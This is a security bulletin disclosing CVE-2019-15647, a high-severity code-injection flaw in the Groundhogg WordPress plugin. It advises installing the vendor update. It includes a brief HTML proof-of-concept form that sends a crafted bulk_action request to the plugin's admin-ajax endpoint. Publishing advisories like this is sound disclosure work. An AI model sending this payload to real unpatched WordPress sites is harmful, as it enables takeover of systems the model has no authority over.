SB2019082717 - Remote code execution in Groundhogg plugin for WordPress
Published: August 27, 2019 Updated: October 25, 2019
Security Bulletin ID
SB2019082717
Severity
High
Patch available
YES
Number of vulnerabilities
1
Exploitation vector
Remote access
Highest impact
Code execution
Breakdown by Severity
- Low
- Medium
- High
- Critical
Description
This security bulletin contains information about 1 security vulnerability.
1) Code Injection (CVE-ID: CVE-2019-15647)
The vulnerability allows a remote attacker to execute arbitrary code on the target system.
The vulnerability exists due to improper input validation in "wp-admin/admin-ajax.php?action=bulk_action_listener" URL. A remote authenticated attacker can send a specially crafted request and execute arbitrary code on the target system.
Successful exploitation of this vulnerability may result in complete compromise of vulnerable system.
PoC:
<html> <body> <form action="http://[host]/wp-admin/admin-ajax.php?action=bulk_action_listener" method="POST"> <input type="hidden" name="bulk_action" value="do_feed_rss" /> <input type="submit" value="Submit" /> </form> </body> </html>
Remediation
Install update from vendor's website.